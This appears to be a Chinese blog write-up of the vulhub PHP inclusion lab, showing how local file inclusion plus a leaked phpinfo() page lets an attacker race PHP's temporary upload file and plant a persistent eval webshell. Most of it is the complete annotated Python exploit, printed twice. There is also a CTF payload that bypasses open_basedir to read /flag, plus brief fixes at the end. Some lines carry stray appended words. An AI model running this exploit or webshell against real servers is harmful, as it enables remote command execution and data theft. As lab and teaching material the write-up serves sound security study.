vulhub-php/php_inclusion_getshell
注:本地測試php文件包含+phpinfo泄露致使getshell,此漏洞與php版本無關php
使用vulhub環境進行復現:python
項目地址:https://github.com/vulhub/vulhub/tree/master/php/inclusiongit
phpinfo路徑:http://127.0.0.1:8080/phpinfo.php 文件包含路徑:http://127.0.0.1:8080/lfi.php
docker-compose up -d 開啓環境後直接使用exp進行運行便可github
此時已經成功在/tmp/g中寫入永久的shell,而後利用文件包含進行getshellweb
http://127.0.0.1:8080/lfi.php?file=/tmp/g&1=system(%22id%22);
此時測試完成,簡單對exp進行一個分析,便於進一步瞭解漏洞的利用詳情docker
首先肯定python的運行環境爲python2.x,分析下各個函數的做用:shell
從main函數開始看:緩存
def main(): print "LFI With PHPInfo()" print "-=" * 30 if len(sys.argv) < 2: print "Usage: %s host [port] [threads]" % sys.argv[0] sys.exit(1) try: host = socket.gethostbyname(sys.argv[1]) except socket.error, e: print "Error with hostname %s: %s" % (sys.argv[1], e) sys.exit(1) port=80 try: port = int(sys.argv[2]) except IndexError: pass except ValueError, e: print "Error with port %d: %s" % (sys.argv[2], e) sys.exit(1) poolsz=10 try: poolsz = int(sys.argv[3]) except IndexError: pass except ValueError, e: print "Error with poolsz %d: %s" % (sys.argv[3], e) sys.exit(1) print "Getting initial offset...", reqphp, tag, reqlfi = setup(host, port) offset = getOffset(host, port, reqphp) sys.stdout.flush() maxattempts = 1000 e = threading.Event() l = threading.Lock() print "Spawning worker pool (%d)..." % poolsz sys.stdout.flush() tp = [] for i in range(0,poolsz): tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) for t in tp: t.start() try: while not e.wait(1): if e.is_set(): break with l: sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) sys.stdout.flush() if counter >= maxattempts: break print if e.is_set(): print "Woot! \m/" else: print ":(" except KeyboardInterrupt: print "\nTelling threads to shutdown..." e.set() print "Shuttin' down..." for t in tp: t.join()
main函數主要獲取目標ip地址和端口號以便於創建socket鏈接,以及獲取上傳webshell的初始化請求數據包和文件包含的請求數據包,以及得到臨時文件名的偏移值,main函數裏定義了maxattempts,最大嘗試次數,以及多線程事件e和多線程鎖l便於對counter進行控制cookie
這裏簡單學習了一下event的用法:多線程
經過threading.Event()能夠建立一個事件管理標誌,Event對象用於線程間通訊。它提供了一組、拆除、等待用於線程間通訊的其餘方法。該標誌(event)默認爲False,event對象主要有四種方法能夠調用:
event.wait(timeout=None):調用該方法的線程會被阻塞,若是設置了timeout參數,超時後,線程會中止阻塞繼續執行;
event.set():將event的標誌設置爲True,調用set方法的全部線程將被喚醒;
event.clear():將event的標誌設置爲False,調用wait方法的全部線程將被阻塞;
event.isSet():判斷event的標誌是否爲True。
因此能夠知道多線程之間經過event中建立的時間管理標誌來實現互相通訊
代碼中還使用到了Lock
#建立鎖
mutex = threading.Lock()
#鎖定
mutex.acquire([timeout])
#釋放
mutex.release()
在多線程中使用lock可讓多個線程在共享資源的時候不會「亂」
當多線程中須要「獨佔資源」的時候,要使用鎖來控制,防止多個線程同時佔用資源而出現其餘異常。
使用鎖的時候就調用acquire()方法,以此告訴其餘線程,我正在佔用該資源,大家要等會;待使用資源後須要釋放資源的時候就調用release()方法,告訴其餘線程,我已經完成使用該資源了,其餘人能夠過來使用了。
而後代碼再講初始化好的變量傳入線程類中,開始調用
最後還用到了join函數
join所完成的工做就是線程同步,即主線程任務結束以後,進入阻塞狀態,一直等待其餘的子線程執行結束以後,主線程再終止
因此整個exp的設計思想是:
主線程初始化全部攻擊線程,攻擊線程中執行具體的payload,須要上傳webshell數據包給phpinfo,以及嘗試包含緩存文件,線程之間經過event事件進行通訊,一旦攻擊線程攻擊成功,即若是成功寫入
/tmp/g,則經過執行set()函數將線程管理標誌置爲true,此時全部縣城將經過執行is_set()函數判斷true,此時線程退出,攻擊結束。
貼一段本身理解註釋之後的代碼:
#coding:utf-8 #python2.x import sys import threading import socket """-------------構造webshell請求包-------------------""" def setup(host, port): #webshell內容,在/tmp/g下寫入shell,payload能夠根據實際狀況進行修改 TAG="Security Test" PAYLOAD="""%s\r <?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG REQ1_DATA="""-----------------------------7dbff1ded0714\r Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r Content-Type: text/plain\r \r %s -----------------------------7dbff1ded0714--\r""" % PAYLOAD padding="A" * 5000 #構造http請求頭,在這裏調整phpinfo的位置 REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r HTTP_ACCEPT: """ + padding + """\r HTTP_USER_AGENT: """+padding+"""\r HTTP_ACCEPT_LANGUAGE: """+padding+"""\r HTTP_PRAGMA: """+padding+"""\r Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r Content-Length: %s\r Host: %s\r \r %s""" %(len(REQ1_DATA),host,REQ1_DATA) #能夠存在文件包含的路徑 #測試文件包含,具體路徑能夠根據實際狀況進行修改 LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r User-Agent: Mozilla/4.0\r Proxy-Connection: Keep-Alive\r Host: %s\r \r \r """ return (REQ1, TAG, LFIREQ) def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s2.connect((host, port)) s.send(phpinforeq) d = "" while len(d) < offset: d += s.recv(offset) try: #在這裏找到真正的緩存文件的名字,一共14位 i = d.index("[tmp_name] => ") fn = d[i+17:i+31] #print fn except ValueError: return None #嘗試利用文件包含漏洞寫入/tmp/g s2.send(lfireq % (fn, host)) d = s2.recv(4096) s.close() s2.close() #測試是否存在Security Test標誌 if d.find(tag) != -1: return fn counter=0 class ThreadWorker(threading.Thread): def __init__(self, e, l, m, *args): threading.Thread.__init__(self) self.event = e self.lock = l self.maxattempts = m self.args = args def run(self): global counter while not self.event.is_set(): #若是沒有線程成功寫入/tmp/g則循環嘗試寫入,醉倒嘗試次數爲maxattempts #由於要操做共享變量counter,因此須要先得到鎖 with self.lock: if counter >= self.maxattempts: return counter+=1 try: x = phpInfoLFI(*self.args) #實際的payload執行,先發送websshell上傳數據包給phpinfo,而後再文件包含寫入永久shell if self.event.is_set(): #判斷是否有其餘線程已經寫入/tmp/g,若是存在循環終止,線程結束 break if x: #若是存在標籤 print "\nGot it! Shell created in /tmp/g" self.event.set() #此時已經寫入/tmp/g,經過set()方法將event標誌置爲1,便於通知其餘線程經過判斷is_set()來結束線程運行 except socket.error: return def getOffset(host, port, phpinforeq): #獲得緩存文件名在輸出流中的位置,便於提取完整文件名 """Gets offset of tmp_name in the php output""" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(phpinforeq) d = "" while True: i = s.recv(4096) d+=i if i == "": break # detect the final chunk if i.endswith("0\r\n\r\n"): break s.close() i = d.find("[tmp_name] => ") if i == -1: raise ValueError("No php tmp_name in phpinfo output") print "found %s at %i" % (d[i:i+10],i) # padded up a bit return i+256 def main(): print "LFI With PHPInfo()" print "-=" * 30 if len(sys.argv) < 2: print "Usage: %s host [port] [threads]" % sys.argv[0] sys.exit(1) try: host = socket.gethostbyname(sys.argv[1]) #獲得目標ip地址 except socket.error, e: print "Error with hostname %s: %s" % (sys.argv[1], e) sys.exit(1) port=80 try: port = int(sys.argv[2]) #獲得端口號 except IndexError: pass except ValueError, e: print "Error with port %d: %s" % (sys.argv[2], e) sys.exit(1) poolsz=10 try: poolsz = int(sys.argv[3]) except IndexError: pass except ValueError, e: print "Error with poolsz %d: %s" % (sys.argv[3], e) sys.exit(1) print "Getting initial offset...", reqphp, tag, reqlfi = setup(host, port) offset = getOffset(host, port, reqphp) sys.stdout.flush() maxattempts = 1000 e = threading.Event() l = threading.Lock() print "Spawning worker pool (%d)..." % poolsz sys.stdout.flush() tp = [] for i in range(0,poolsz): tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) for t in tp: t.start() try: #主線程也會判斷是否成功寫入/tmp/g while not e.wait(1): if e.is_set(): break with l: sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) sys.stdout.flush() if counter >= maxattempts: break print if e.is_set(): print "Woot! \m/" else: print ":(" except KeyboardInterrupt: print "\nTelling threads to shutdown..." e.set() print "Shuttin' down..." for t in tp: t.join() if __name__=="__main__": main()
上次在國賽中也遇到了相似的題目,不過題目在文件包含上稍微作了一些限制,以及有禁用函數
文件包含代碼以下:
<?php error_reporting(0); $file=$_GET["file"]; highlight_file(__FILE__); if(!is_array($file)){ if (strpos(file_get_contents($file), "We1come_To_C1sCn")!==false){ include($file); }else{ echo "Give up!"; } }else{ die("Give up Hacker!"); } ?>
直接接收file參數,而且讀取file的內容判斷其中是否存在We1come_To_C1sCn,若是存在則把文件中的file文件中的代碼包含進來,題目中存在open_basedir和disable_function限制了能訪問的文件的路徑只能在當前目錄以及禁用的函數,而flag文件在/目錄下面
繞過方法有:
1.ini_set("open_basedir","..");+chdir("..")輕鬆繞過,具體分析見https://xz.aliyun.com/t/4720
另外一種常見繞過方法,執行執行系統命令system,不受open_basedir的限制
在本地構造test.txt爲
<?php echo "c1sec2333"; chdir("tips"); ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/flag')); //We1come_To_C1sCn ?>
利用以前的exp進行修改便可獲得flag
修復方法:
1.刪除掉phpinfo
2.使用白名單,經過switch,判斷要包含的文件名在不在合法的可包含文件名之中
3.過濾..
if (str_replace("..", '', $tmpname) !== $tmpname)
這樣就不能再路徑中使用目錄穿越
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
